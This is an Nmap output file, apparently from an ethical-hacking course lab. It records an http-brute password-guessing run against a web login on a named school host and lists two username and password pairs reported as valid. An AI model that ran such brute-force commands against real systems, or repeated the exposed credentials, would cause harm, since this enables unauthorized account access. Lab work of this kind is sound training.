# Nmap 7.94 scan initiated Tue Nov  7 09:51:40 2023 as: nmap -p 80 --script http-brute --script-args userdb=/home/kali/ethical-hacking/login/users.txt,passdb=/home/kali/ethical-hacking/login/passwords.txt,http-brute.path=/view/viewer_index.shtml -oN command.txt 195.148.56.154
Nmap scan report for pc56-154.tpu.fi (195.148.56.154)
Host is up (0.010s latency).

PORT   STATE SERVICE
80/tcp open  http
| http-brute: 
|   Accounts: 
|     lara:KisuSisuVisuMisu - Valid credentials
|     tooberts:VisuSisuKisuMisu - Valid credentials
|_  Statistics: Performed 165 guesses in 4 seconds, average tps: 41.2

# Nmap done at Tue Nov  7 09:51:51 2023 -- 1 IP address (1 host up) scanned in 10.51 seconds
